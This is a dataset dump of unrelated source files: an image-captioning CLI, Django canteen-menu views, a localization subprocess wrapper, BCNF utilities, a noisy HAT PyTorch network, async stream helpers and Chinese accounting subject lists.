#args.model_weights, args.image_model, args.language_model, args.vocab, args.image_list, args.precomputed_features\n\n model_weights = caption_weights_root + args.model_weights\n image_model = models_root + args.image_model\n language_model = models_root + args.language_model\n vocab = vocab_root + args.vocab\n precomputed_feats = feature_dir + args.precomputed_features\n\n image_list = open_txt(image_list_root + args.image_list)\n\n captioner = Captioner(model_weights, image_model, language_model, vocab, precomputed_feats=precomputed_feats,\n prev_word_restriction=True, image_feature='data', language_feature='probs')\n captioner.generate_sentences(imagenet_images_root, image_list, temp=float('inf'), dset='imagenet')\n\ndef eval_imagenet(args):\n result = eval_sentences.make_imagenet_result_dict(generated_sentences + args.caps) \n eval_sentences.find_successful_classes(result)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image_model\",type=str)\n parser.add_argument(\"--language_model\",type=str)\n parser.add_argument(\"--model_weights\",type=str)\n parser.add_argument(\"--image_list\", type=str)\n parser.add_argument(\"--imagenet_images\",type=str, default=None) #extract_features\n parser.add_argument(\"--lexical_feature\",type=str, default='probs') #name of layer to extract\n parser.add_argument(\"--orig_attributes\",type=str, default='')\n parser.add_argument(\"--all_attributes\",type=str, default='')\n parser.add_argument(\"--vocab\", type=str, default='')\n parser.add_argument(\"--words\", type=str, default='')\n parser.add_argument(\"--precomputed_features\", type=str, default=None) #list of classifiers\n parser.add_argument(\"--classifiers\", type=str, default='') #list of classifiers\n parser.add_argument(\"--closeness_metric\", type=str, default='closeness_embedding')\n parser.add_argument(\"--transfer_type\", type=str, default='direct_transfer')\n parser.add_argument(\"--split\", type=str, default='val_val')\n parser.add_argument(\"--caps\", type=str, default='')\n\n parser.add_argument(\"--orig_model\", type=str, default='')\n parser.add_argument(\"--new_model\", type=str, default='')\n parser.add_argument(\"--language_feature\", type=str, default='predict')\n parser.add_argument(\"--image_feature\", type=str, default='data')\n\n parser.add_argument(\"--device\",type=int, default=0)\n parser.add_argument(\"--image_dim\",type=int, default=227)\n parser.add_argument(\"--batch_size\",type=int, default=10)\n parser.add_argument(\"--num_transfer\",type=int, default=1)\n\n parser.add_argument('--extract_features', dest='extract_features', action='store_true')\n parser.set_defaults(extract_features=False)\n parser.add_argument('--generate_coco', dest='generate_coco', action='store_true')\n parser.set_defaults(generate_coco=False)\n parser.add_argument('--generate_imagenet', dest='generate_imagenet', action='store_true')\n parser.set_defaults(generate_imagenet=False)\n parser.add_argument('--eval_imagenet', dest='eval_imagenet', action='store_true')\n parser.set_defaults(eval_imagenet=False)\n parser.add_argument('--transfer', dest='transfer', action='store_true')\n parser.set_defaults(transfer=False)\n parser.add_argument('--log', dest='log', action='store_true')\n parser.set_defaults(log=False)\n\n args = parser.parse_args()\n \n if args.extract_features:\n extract_features(args) \n\n if args.transfer:\n transfer(args)\n\n if args.generate_coco:\n generate_coco(args)\n\n if args.generate_imagenet:\n generate_imagenet(args)\n \n if args.eval_imagenet:\n eval_imagenet(args)\n","sub_path":"dcc.py","file_name":"dcc.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"171477071","text":"from django.shortcuts import render\r\nfrom django.http import Http404, HttpResponse\r\nfrom django.shortcuts import render, redirect\r\nfrom .models import product\r\nfrom orders.models import order, basket\r\nimport json\r\n\r\ndef index(request):\r\n # products = {\r\n # 'Супы':product.objects.filter(category='1'),\r\n # 'Гарниры':product.objects.filter(category='2'),\r\n # 'Горячие блюда':product.objects.filter(category='3'),\r\n # 'Салаты':product.objects.filter(category='4'),\r\n # 'Завтраки':product.objects.filter(category='5'),\r\n # 'Выпечка':product.objects.filter(category='6'),\r\n # 'Дополнительно':product.objects.filter(category='7'),\r\n # }\r\n\r\n products = product.objects.all\r\n categories = [\r\n 'Супы',\r\n 'Гарниры',\r\n 'Горячие блюда',\r\n 'Салаты',\r\n 'Завтраки',\r\n 'Выпечка',\r\n 'Другое'\r\n ]\r\n try:\r\n order_now = order.objects.get(user=request.user, status_pay=False)\r\n in_basket = basket.objects.filter(order=order_now)\r\n basket_items = []\r\n for i in in_basket:\r\n # print(i.product)\r\n basket_items.append(i.product)\r\n context = {'page':'Меню', 'products': products, 'categories':categories, 'basket':basket_items}\r\n except:\r\n context = {'page':'Меню', 'products': products, 'categories':categories}\r\n # print(products)\r\n return render(request, 'menu_page.html', context)\r\n\r\ndef add_product(request):\r\n if request.method == \"POST\" and request.is_ajax:\r\n data={\r\n 'product_id': request.POST.get('product_id')\r\n }\r\n json_dist = json.dumps(data)\r\n # print(json_dist)\r\n dist = json.loads(json_dist)\r\n this_product = product.objects.get(id=int(dist['product_id']))\r\n \r\n this_order, created = order.objects.get_or_create(user=request.user, status_pay=False)\r\n\r\n\r\n try:\r\n pib = basket.objects.get(order=this_order, product=this_product)\r\n # print ('получили продукт',pib)\r\n pib.delete()\r\n if not this_order.products.all():\r\n this_order.delete()\r\n except basket.DoesNotExist:\r\n basket.objects.create(order=this_order, product=this_product)\r\n finally:\r\n pass\r\n\r\n # if basket.objects.filter(order=this_order, product=this_product):\r\n # print('товар есть в корзине')\r\n # pib = basket.objects.filter(order=this_order).get(product=this_product) #product in basket\r\n \r\n \r\n \r\n # data['error']='Что-то пошло не так :('\r\n # if basket.objects.filter(order=this_order, product=this_product):\r\n # # print('товар есть в корзине')\r\n # pib = basket.objects.filter(order=this_order).get(product=this_product) #product in basket\r\n # pib.quantity += int(dist['product_quantity'])\r\n # if pib.quantity >5:\r\n # print('true')\r\n # data['error']='В корзине не может быть больше пяти порций товара!'\r\n # else:\r\n # print('false')\r\n # pib.save()\r\n # else:\r\n # # print('товара нет в корзине')\r\n # this_order.products.add(this_product)\r\n # pib = basket.objects.filter(order=this_order).get(product=this_product) #product in basket\r\n # pib.quantity = int(dist['product_quantity'])\r\n # if pib.quantity >5:\r\n # data['error']='В корзине не может быть больше пяти порций товара!'\r\n # else:\r\n # pib.save()\r\n\r\n return HttpResponse(json.dumps(data), content_type='application/json')\r\n else:\r\n raise Http404","sub_path":"refectory/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"409503699","text":"import subprocess\nimport os\nfrom subprocess import call\nfrom Parser import ParseLocalizationResults\n\n\"\"\"\n This class will handle calling the localization routine,\n parse the results to find K, R, T and return them to \n the callee.\n\"\"\"\nclass Localize():\n def __init__(self, configManager):\n self.__imageFileName = None\n self.__directoryName = None\n self.__K = None\n self.__R = None\n self.__T = None\n self.__confManager = configManager\n self.__localizationBinary = self.__confManager.getLocalizationBinaryPath()\n self.__knnLocalizationBinary = self.__confManager.getKNNLocalizationBinaryPath()\n self.__activeSearchLocalizationBinary = self.__confManager.getActiveSearchLocalizationBinary()\n self.__dictionary = self.__confManager.getDictionary()\n self.__computedDescriptorsLocalizationBin = self.__confManager.getComputedDescriptorsLocalizationBin()\n self.__computedDescriptorsActiveSearchBin = self.__confManager.getComputedDescriptorsActiveSearchBin()\n self.__listQueryText = None\n self.__numberOfClusters = self.__confManager.getNumberOfClusters()\n self.__bundleDotOut = self.__confManager.getBundletDotOutFile()\n self.__technique = self.__confManager.getTechnique()\n\n \"\"\"\n Create a temporary file that can be simply passed to localization\n routine.\n \"\"\"\n def setImageFileName(self, imagePath):\n self.__imageFileName = imagePath\n self.__directoryName = os.path.dirname(imagePath)\n filename_w_ext = os.path.basename(self.__imageFileName)\n filename, file_extension = os.path.splitext(filename_w_ext)\n self.__listQueryText = os.path.join(self.__directoryName,\"list.query.keys.txt\")\n\n with open(self.__listQueryText, 'w') as fp:\n fp.write(os.path.join(self.__directoryName,filename+\".key\"))\n\n def display(self):\n print(\" ImageFileName = \" + self.__imageFileName)\n\n\n \"\"\"\n This function calls the localization routine, its results are saved \n in a temporary text file. Which is then parsed to find the desired\n matrices\n \"\"\"\n def localize(self):\n localizationResultsFile = 'localizationResults.txt'\n internalLocalizationResults = os.path.join(self.__directoryName, \"results.txt\")\n\n with open(localizationResultsFile, 'wb') as fp_out:\n if self.__technique == '0':\n print(\"Using ACG Localizer\")\n call([self.__localizationBinary, self.__listQueryText, \"1\", self.__numberOfClusters, self.__dictionary, self.__computedDescriptorsLocalizationBin, \"0\", \"0.2\", \"0 \", internalLocalizationResults], stdout=fp_out)\n else:\n print(\"Using Active Search\")\n call([self.__activeSearchLocalizationBinary, self.__listQueryText, self.__bundleDotOut, self.__numberOfClusters, self.__dictionary, self.__computedDescriptorsActiveSearchBin, \"0\", internalLocalizationResults, \"200\", \"1\", \"1\", \"1\", \"10\"], stdout=fp_out)\n\n parser = ParseLocalizationResults.Parser()\n parser.setResultsFile(localizationResultsFile)\n parsedResults = parser.parse()\n print(\"Parsed Results :: \", parsedResults)\n return parsedResults","sub_path":"Localization/Localize.py","file_name":"Localize.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"484916546","text":"#!/usr/bin/env python\n\n__author__ = 'Giovanni Venancio de Souza'\n\n\nimport sys\nimport itertools\n\n\nclass BCNF(object):\n\n def get_functional_dependencies(self, inputs):\n \"\"\"\n Get functional dependencies from stdin\n \"\"\"\n\n FD, dependencies = [], []\n\n for deps in inputs:\n if deps.endswith('\\n'):\n dependencies.append([deps[:-1]])\n else:\n dependencies.append([deps])\n\n for dep in dependencies:\n dep = dep[0].split('->')\n FD.append([ dep[0].split(','), dep[1].split(',') ])\n\n return FD\n\n def super_relation(self, dependencies):\n \"\"\"\n Create super relation from funcional dependencies\n \"\"\"\n\n attrs = []\n\n for dep in dependencies:\n attrs += dep[0]\n attrs += dep[1]\n\n relation = set()\n for attr in attrs:\n relation.add(attr)\n\n return list(relation)\n\n def closure(self, dependencies, super_relation):\n \"\"\"\n Calculate key from closure of functional dependencies\n \"\"\"\n\n # In a list of FDs (X->Y), holds all X attributes\n x = []\n\n for dep in dependencies:\n x += dep[0]\n\n # Holds combinations of all attributes (candidate keys)\n c_keys = []\n\n # Generate combinations\n for e in range(1, len(x)):\n for combination in itertools.combinations(x, e):\n c_keys.append(combination)\n\n for key in c_keys:\n # Holds attributes from closure\n key_set = set(key)\n\n while True:\n old_set = key_set.copy()\n\n for dep in dependencies:\n # Verify if all attributes from X of FD is in closure set\n for attr in dep[0]:\n found = True if attr in list(key_set) else False\n if found:\n for attr in dep[1]:\n key_set.add(attr)\n\n # If set hasn't changed\n if old_set == key_set:\n break\n\n # If candidate key generate all attributes of super relation,\n # we found the key of super relation\n if key_set == set(super_relation):\n return list(key)\n\n # If no key is found, a candidate key is used\n return BCNF.candidate_key(self, dependencies)\n\n def candidate_key(self, dependencies):\n \"\"\"\n Calculate candidate key for super relation\n Get all attributes that appear on left-side but not on the right-side of FDs\n \"\"\"\n\n candidate_key = []\n\n # In a list of FDs (X->Y), get all X attributes\n attrs = []\n\n for dep in dependencies:\n attrs += dep[0]\n\n for x in attrs:\n found = False\n\n for attr in dependencies:\n if x in attr[1]:\n found = True\n break\n\n if not found:\n candidate_key.append(x)\n\n return candidate_key\n\n def write_final_relations(self, rn, violates):\n \"\"\"\n Write to stdout the result of decomposition\n \"\"\"\n\n i = 0\n\n sys.stdout.write('R0(%s)' % (','.join(rn[0])) + '\\n')\n\n for relations in rn:\n if i not in violates:\n sys.stdout.write('R%d(%s)' % (i, ','.join(relations)) + '\\n')\n\n i += 1\n","sub_path":"Grade/Banco de Dados/trabalho 1/gvs11/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"452823917","text":"a=int(input(\"enter a loop 1st number.\\n\"))\r\nb=int(input(\"input last number.\\n\"))\r\na=b//2\r\nwhile a>1:\r\n print(\"\\na:\",a,end=' ')\r\n if b % a ==0:\r\n print(b,\"has_factor\",a)\r\n break\r\n a=a-1\r\n \r\nelse:\r\n print(b,\"is_prime.\\n\")\r\n","sub_path":"factor.py","file_name":"factor.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"163683597","text":"import sys\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.parameter import Parameter\nfrom torch.nn import init\nimport utils\n\nclass NoisyLinear(nn.Module):\n def __init__(self, in_features, out_features, bias=True):\n super(NoisyLinear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(torch.Tensor(out_features, in_features))\n self.weight_noise = Parameter(torch.Tensor(out_features, in_features), requires_grad=False)\n self.bias = Parameter(torch.Tensor(out_features))\n self.bias_noise = Parameter(torch.Tensor(out_features), requires_grad=False)\n self.reset_parameters()\n\n def reset_parameters(self):\n # param initialization\n init.kaiming_uniform_(self.weight, a=math.sqrt(5))\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias, -bound, bound)\n # noise param initialization\n init.kaiming_uniform_(self.weight_noise, a=math.sqrt(5))\n fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight_noise)\n bound = 1 / math.sqrt(fan_in)\n init.uniform_(self.bias_noise, -bound, bound)\n\n def forward(self,x, x_noise=None):\n if x_noise is None:\n x_noise = x\n output_origin = F.linear(x, self.weight, self.bias)\n output_noise = F.linear(x_noise, self.weight_noise, self.bias_noise)\n return output_origin, output_noise\n\nclass Net(torch.nn.Module):\n def __init__(self,inputsize,taskcla,nlayers=2,nhid=2000,pdrop1=0.2,pdrop2=0.5):\n super(Net,self).__init__()\n\n ncha,size,_=inputsize\n self.taskcla=taskcla\n\n self.nlayers=nlayers\n\n self.relu=torch.nn.ReLU()\n #self.drop1=torch.nn.Dropout(pdrop1)\n #self.drop2=torch.nn.Dropout(pdrop2)\n #self.fc1=torch.nn.Linear(ncha*size*size,nhid)\n self.fc1 = NoisyLinear(ncha*size*size,nhid)\n self.efc1=torch.nn.Embedding(len(self.taskcla),nhid)\n if nlayers>1:\n #self.fc2=torch.nn.Linear(nhid,nhid)\n self.fc2=NoisyLinear(nhid,nhid)\n self.efc2=torch.nn.Embedding(len(self.taskcla),nhid)\n if nlayers>2:\n #self.fc3=torch.nn.Linear(nhid,nhid)\n self.fc3=NoisyLinear(nhid,nhid)\n self.efc3=torch.nn.Embedding(len(self.taskcla),nhid)\n self.last=torch.nn.ModuleList()\n for t,n in self.taskcla:\n #self.last.append(torch.nn.Linear(nhid,n))\n self.last.append(NoisyLinear(nhid,n))\n\n self.gate=torch.nn.Sigmoid()\n \"\"\" (e.g., used with compression experiments)\n lo,hi=0,2\n self.efc1.weight.data.uniform_(lo,hi)\n self.efc2.weight.data.uniform_(lo,hi)\n self.efc3.weight.data.uniform_(lo,hi)\n #\"\"\"\n\n return\n\n def forward(self,t,x,s=1):\n # Gates\n masks=self.mask(t,s=s)\n if self.nlayers==1:\n gfc1=masks\n elif self.nlayers==2:\n gfc1,gfc2=masks\n elif self.nlayers==3:\n gfc1,gfc2,gfc3=masks\n else:\n raise ValueError\n # Gated\n #h=self.drop1(x.view(x.size(0),-1)) # Original code, applying dropout on input data and hidden layers\n #h=self.drop2(self.relu(self.fc1(h)))\n h = x.view(x.size(0),-1)\n output1_origin, output1_noise = self.fc1(h)\n output1 = output1_origin.mul_(gfc1.abs().sign()) + output1_noise\n h1 = self.relu(output1)\n h_origin, h_noise = h1.mul_(gfc1), h1\n if self.nlayers>1:\n output2_origin, output2_noise = self.fc2(h_origin, h_noise)\n output2 = output2_origin.mul_(gfc2.abs().sign()) + output2_noise\n h2 = self.relu(output2)\n h_origin, h_noise = h2.mul_(gfc2), h2\n #h=self.drop2(self.relu(self.fc2(h)))\n #h=h*gfc2.expand_as(h)\n if self.nlayers>2:\n output3_origin, output3_noise = self.fc3(h_origin, h_noise)\n output3 = output3_origin.mul_(gfc3.abs().sign()) + output3_noise\n h3 = self.relu(output3)\n h_origin, h_noise = h3.mul_(gfc3), h3\n #h=self.drop2(self.relu(self.fc3(h)))\n #h=h*gfc3.expand_as(h)\n y=[]\n for t,i in self.taskcla:\n output_origin, output_noise = self.last[t](h_origin, h_noise)\n y.append(output_origin + output_noise)\n return y, masks\n\n def mask(self,t,s=1):\n gfc1=self.gate(s*self.efc1(t))\n if self.nlayers==1: return gfc1\n gfc2=self.gate(s*self.efc2(t))\n if self.nlayers==2: return [gfc1,gfc2]\n gfc3=self.gate(s*self.efc3(t))\n return [gfc1,gfc2,gfc3]\n\n def get_view_for(self,name,masks):\n if self.nlayers==1:\n gfc1=masks\n elif self.nlayers==2:\n gfc1,gfc2=masks\n elif self.nlayers==3:\n gfc1,gfc2,gfc3=masks\n if name == 'fc1.weight':\n return gfc1.data.view(-1,1).expand_as(self.fc1.weight)\n elif name == 'fc1.bias':\n return gfc1.data.view(-1)\n elif name == 'fc2.weight':\n post = gfc2.data.view(-1,1).expand_as(self.fc2.weight)\n pre = gfc1.data.view(1,-1).expand_as(self.fc2.weight)\n return torch.min(post,pre)\n elif name == 'fc2.bias':\n return gfc2.data.view(-1)\n elif name == 'fc3.weight':\n post = gfc3.data.view(-1,1).expand_as(self.fc3.weight)\n pre = gfc2.data.view(1,-1).expand_as(self.fc3.weight)\n return torch.min(post,pre)\n elif name == 'fc3.bias':\n return gfc3.data.view(-1)\n else:\n return None\n\n","sub_path":"NoisyHAT/networks/noisymlp_hat.py","file_name":"noisymlp_hat.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"430338521","text":"import codecs\nfrom curio.meta import finalize\n\n\nasync def stream_decode_response_unicode(iterator, r):\n \"\"\"Stream decodes a iterator.\"\"\"\n\n async with finalize(iterator) as iterator:\n if r.encoding is None:\n async for item in iterator:\n yield item\n return\n\n decoder = codecs.getincrementaldecoder(r.encoding)(errors='replace')\n async for chunk in iterator:\n rv = decoder.decode(chunk)\n if rv:\n yield rv\n rv = decoder.decode(b'', final=True)\n if rv:\n yield rv\n\n\nasync def iter_slices(string, slice_length):\n \"\"\"Iterate over slices of a string.\"\"\"\n pos = 0\n if slice_length is None or slice_length <= 0:\n slice_length = len(string)\n while pos < len(string):\n yield string[pos:pos + slice_length]\n pos += slice_length\n","sub_path":"curequests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"328146408","text":"# 货币资金\nmonetary_funds = [\"库存现金\",\"银行存款\",\"其他货币资金\"]\n# 存货类科目\ninventory = [\"原材料\", \"包装物\", \"低值易耗品\", \"库存商品\", \"委托加工物资\", \"周转材料\", \"材料采购\", \"物资采购\",\"材料采购\", \"包装物及低值易耗品\", \"产成品\", \"生产成本\",\"主营业务成本\"]\n# 存货类科目包含税费\ninventory_tax = [\"原材料\", \"包装物\", \"低值易耗品\", \"库存商品\", \"委托加工物资\", \"周转材料\", \"材料采购\", \"物资采购\",\"材料采购\", \"包装物及低值易耗品\", \"产成品\",\"应交税费\",\"生产成本\",\"主营业务成本\"]\n# 长期资产类科目\nlong_term_assets = [\"固定资产\", \"无形资产\", \"在建工程\", \"工程物资\", \"长期待摊费用\", \"开发支出\"]\n# 长期资产类科目\nlong_term_assets_tax = [\"固定资产\", \"无形资产\", \"在建工程\", \"工程物资\", \"长期待摊费用\", \"开发支出\",\"应交税费\"]\n# 费用类科目\nexpense = [\"管理费用\", \"销售费用\", \"营业费用\", \"研发费用\", \"制造费用\"]\n# 费用类科目包含税费\nexpense_tax = [\"管理费用\", \"销售费用\", \"营业费用\", \"研发费用\", \"制造费用\",\"应交税费\"]\n# 收入确认借方标准科目\nrecognition_income_debit = [\"应收账款\",\"库存现金\",\"银行存款\",\"预收款项\",\"合同负债\",\"长期应收款\",\"应收票据\"]\n# 收入确认贷方标准科目\nrecognition_income_credit = [\"应交税费\",\"主营业务收入\"]\n# 应收款项\nreceivables = [\"应收账款\",\"预付款项\",\"其他应收款\",\"应收票据\"]\n# 应付款项\npayments = [\"应付账款\",\"预收款项\",\"其他应付款\",\"应付票据\"]\n# 应交税费\ntax_payable = {\"应交个人所得税\":\"个人所得税\",\"应交土地使用税\":\"土地使用税\",\"应交堤围费\":\"堤围费\",\"应交堤围防护费\":\"堤围费\",\n \"应交企业所得税\":\"企业所得税\",\"应交所得税\":\"企业所得税\",\"应交城市维护建设税\":\"城市维护建设税\",\"应交城建税\":\"城市维护建设税\",\n \"应交房产税\":\"房产税\",\"应交土地增值税\":\"土地增值税\",\"应交车船使用税\":\"车船使用税\",\"应交车船税\":\"车船使用税\",\n \"应交印花税\":\"印花税\",\"应交城镇土地使用税\":\"土地使用税\",\"应交地方教育费附加\":\"地方教育费附加\",\n \"应交消费税\":\"消费税\",\"应交营业税\":\"营业税\",\"应交资源税\":\"资源税\",\"预交增值税\":\"增值税-预交增值税\",\n \"待抵扣进项税额\":\"增值税-待抵扣进项税额\",\"已交税金\":\"已交税金\",\"未交增值税\":\"增值税-未交增值税\",\n \"待转销项税额\":\"增值税-待转销项税额\",\"增值税留抵税额\":\"增值税-增值税留抵税额\",\"简易计税\":\"增值税-简易计税\",\n \"转让金融商品应交增值税\":\"增值税-转让金融商品应交增值税\",\"代扣代交增值税\":\"增值税-代扣代缴增值税\",\n \"转出未交增值税\":\"增值税-转出未交增值税\",\"减免税款\":\"增值税-减免税款\",\"出口退税\":\"增值税-出口退税\",\n \"出口抵减内销产品应纳税额\":\"增值税-出口抵减内销产品应纳税额\",\"销项税额\":\"增值税-销项税额\",\n \"进项税额转出\":\"增值税-进项税额转出\",\"转出多交增值税\":\"增值税-转出多交增值税\",\"销项税额抵减\":\"增值税-销项税额抵减\"\n }\n# 往来款项\nreceivables_and_payments = [\"应收账款\",\"预付款项\",\"其他应收款\",\"应付账款\",\"预收款项\",\"其他应付款\"]\n# 其他应收款款项性质\nother_receivable_natures = [\n {\"keywords\": [\"押金\",\"保证金\",\"质保金\",\"履约金\"],\"contain_event\":\"押金及保证金\",\"problem\": None},\n {\"keywords\": [\"罚款\",\"赔款\",\"保险赔款\"],\"contain_event\":\"罚款及赔款\",\"problem\": None},\n {\"keywords\": [\"备用金\",\"员工借款\"],\"contain_event\":\"员工备用金\",\"problem\": None},\n {\"keywords\": [\"代缴\",\"代垫\",\"代付\",\"水电费\",\"医药费\",\"房租费\",\"社保\",\"公积金\",\n \"养老保险\",\"医疗保险\",\"失业保险\",\"工伤保险\",\"生育保险\",\"社会保险\"],\"contain_event\":\"代缴代付款\",\"problem\": None},\n {\"keywords\": [\"公司\",\"厂\",\"往来款\",\"集团内部\",\"内部往来\"],\"contain_event\":\"公司往来款\",\"problem\": None},\n ]\nother_payable_natures = [\n {\"keywords\": [\"押金\", \"保证金\",\"质保金\",\"履约金\"], \"contain_event\": \"押金及保证金\", \"problem\": None},\n {\"keywords\": [\"罚款\", \"赔款\", \"保险赔款\"], \"contain_event\": \"罚款及赔款\", \"problem\": None},\n {\"keywords\": [ \"代收\", \"水电费\", \"医药费\", \"房租费\", \"社保\", \"公积金\",\n \"养老保险\", \"医疗保险\", \"失业保险\", \"工伤保险\", \"生育保险\", \"社会保险\"], \"contain_event\": \"暂收代付款\", \"problem\": None},\n {\"keywords\": [\"公司\", \"厂\", \"往来款\",\"集团内部\",\"内部往来\"], \"contain_event\": \"公司往来款\", \"problem\": None},\n ]\n# 资产减值准备\nasset_impairment = [\"坏账准备\",\"存货跌价准备\",'可供出售金融资产减值准备',\"持有至到期投资减值准备\",\"债权投资减值准备\",\n \"长期股权投资减值准备\",\"固定资产减值准备\",\"在建工程减值准备\",\"无形资产减值准备\",\n \"商誉减值准备\"\n ]\n# 流动资产\ncurrent_assets = [*monetary_funds,\"结算备付金\",\"拆出资金\",\"交易性金融资产\",\"以公允价值计量且其变动计入当期损益的金融资产\",\n \"衍生金融资产\",\"应收票据\",\"应收账款\",\"待摊费用\",\"预付款项\",\"应收股利\",\"应收利息\",\"应收保费\",\"应收分保账款\",\"应收分保合同准备金\",\n \"内部存款\",\"内部存款\",\"应收补贴款\",\"其他应收款\",\"买入返售金融资产\",*inventory,\"合同资产\",\"持有待售资产\",\"一年内到期的非流动资产\",\n \"待处理财产损溢\",\"其他流动资产\"\n ]\n# 非流动资产\nnon_current_assets = [\n \"委托贷款\",\"发放委托贷款及垫款\",\"债权投资\",\"可供出售金融资产\",\"其他债权投资\",\"持有至到期投资\",\"长期应收款\",\"长期股权投资\",\n \"其他权益工具投资\",\"其他非流动金融资产\",\"投资性房地产\",\"固定资产\",\"固定资产清理\",\"在建工程\",\"生产性生物资产\",\"油气资产\",\n \"使用权资产\",\"无形资产\",\"工程物资\",\"开发支出\",\"商誉\",\"长期待摊费用\",\"递延所得税资产\",\"其他非流动资产\"\n]\n# 资产\nassets = [*current_assets,*non_current_assets]\n# 流动负债\ncurrent_liabilities = [\"短期借款\",\"向中央银行借款\",\"吸收存款及同业存放\",\"拆入资金\",\"交易性金融负债\",\"以公允价值计量且其变动计入当期损益的金融负债\",\n \"衍生金融负债\",\"应付票据\",\"应付账款\",\"预收款项\",\"卖出回购金融资产款\",\"应付手续费及佣金\",\"应付职工薪酬\",\"应付福利费\",\n \"其他应交款\",\"应付利息\",\"应付股利\",\"应交税费\",\"预提费用\",\"其他应付款\",\"应付分保账款\",\"合同负债\",\"保险合同准备金\",\n \"代理买卖证券款\",\"代理承销证券款\",\"持有待售负债\",\"一年内到期的非流动负债\",\"其他流动负债\"\n ]\n# 非流动负债\nnon_current_liabilities = [\"长期借款\",\"应付债券\",\"租赁负债\",\"长期应付款\",\"专项应付款\",\"长期应付职工薪酬\",\"预计负债\",\"递延收益\",\n \"递延所得税负债\",\"附属企业往来\",\"其他非流动负债\"\n ]\n# 负债\nliabilities = [*current_liabilities,*non_current_liabilities]\n# 所有者权益\nequity = [\"股本\",\"其他权益工具\",\"资本公积\",\"库存股\",\"其他综合收益\",\"专项储备\",\"盈余公积\",\"一般风险准备\",\"少数股东权益\"]\n# 收入\nincome = [\"主营业务收入\",\"其他业务收入\",\"租赁收入\",\"利息收入\",\"已赚保费\",\"手续费及佣金收入\",\"其他收益\",\"投资收益\",\"净敞口套期收益\",\n \"公允价值变动收益\",\"资产处置收益\",\"汇兑收益\",\"营业外收入\"]\n# 成本费用\ncost = [\"主营业务成本\",\"其他业务成本\",\"利息支出\",\"手续费及佣金支出\",\"退保金\",\"赔付支出净额\",\"提取保险合同准备金净额\",\"保单红利支出\",\n \"分保费用\",\"税金及附加\",\"销售费用\",\"管理费用\",\"研发费用\",\"财务费用\",\"信用减值损失\",\"资产减值损失\",\"营业外支出\",\"所得税费用\"]\n\nmonetary_funds_and_financial_fee = [\"库存现金\",\"银行存款\",\"其他货币资金\",\"财务费用\"]\n# 增值税标准销项税率\nsale_rate = {\n \"1994-1-1\":[0.17,0.13,0.06],\n \"2017-7-1\":[0.17,0.11,0.06],\n \"2018-5-1\":[0.16,0.10,0.06],\n \"2019-4-1\":[0.13,0.09,0.06]\n}\n# 其他业务收入-租赁收入描述\nother_income_rent_desc = [\"出租\",\"租赁\",\"租金\"]\n# 利息描述\ninterest_desc = [\"利息\",\"结息\"]\n# 手续费描述\nbank_charges_desc = [\"手续费\",\"服务费\"]\n# 汇兑损益描述\nexchange_desc = [\"汇率\",\"汇兑\",\"外币\",\"结汇\",\"兑换\",\"折算\"]\n# 职工薪酬描述\nsalary_desc = [\"工资\",\"奖金\",\"福利\",\"津贴\",\"社会保险\",\"社保\",\"养老保险\",\"劳动保险\",\"医疗保险\",\n \"失业保险\",\"工伤保险\",\"公积金\",\"生育保险\",\"意外伤害险\",\"直接人工\",\"人工费\",\"职工教育经费\",\n \"退休金\",\"工会经费\",\"过节费\",\"辞退福利\",\"职工薪酬\",\"补充养老保险\",\"补充医疗保险\"\n ]\n# 职工薪酬归集科目\nsalary_collection_subjects= [\"管理费用\", \"销售费用\", \"营业费用\", \"研发费用\", \"制造费用\",\"在建工程\", \"长期待摊费用\", \"开发支出\",\"生产成本\"]\n# 应收票据减少标准科目名称\nnotes_receivable_subjects = [\"银行存款\",\"财务费用\",\"应收票据\",\"应付账款\"]\n# 财政贴息描述\ninterest_on_financial_subsidy = [\"财政贴息\", \"政府贴息\",\"贴息\"]\n# 政府补助\ngovernment_grants = [\"政府补助\", \"政府补贴\"]\n# 应付债券-应计利息\nbonds_payable_interest = [\"应计利息\"]\n# 营业成本\noperating_cost = [\"主营业务成本\",\"其他业务成本\"]\n# 利息归集科目\ninterest_collection_subjects=[\"在建工程\",\"财务费用\",\"制造费用\"]\n# 科目对应的描述\n\nsubject_descs = [\n {\"no\":1,\"subject\":\"本年利润\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":[\"利润分配\"],\"event\":\"本年利润结转至利润分配\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"损益结转至本年利润\",\"problem\":None},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":[\"利润分配\"],\"event\":\"本年利润结转至利润分配\",\"problem\":None},\n {\"opposite\":\"all\",\"event\":\"损益结转至本年利润\",\"problem\":None},\n ]},\n{\"no\":2,\"subject\":\"主营业务收入\",\"debit_only_one\":False,\"debit\":\n [\n {\"opposite\":\"all\",\"event\":\"主营业务收入在借方\",\"problem\":\"主营业务收入在借方\"},\n ],\n \"credit_only_one\":False,\n \"credit\":[\n {\"opposite\":\"all\",\"event\":\"确认主营业务收入\",\"problem\":None},\n ]},\n{\"no\":3,\"subject\":\"其他业务收入\",\"debit_only_one\":False,\"debit\":\n[\n 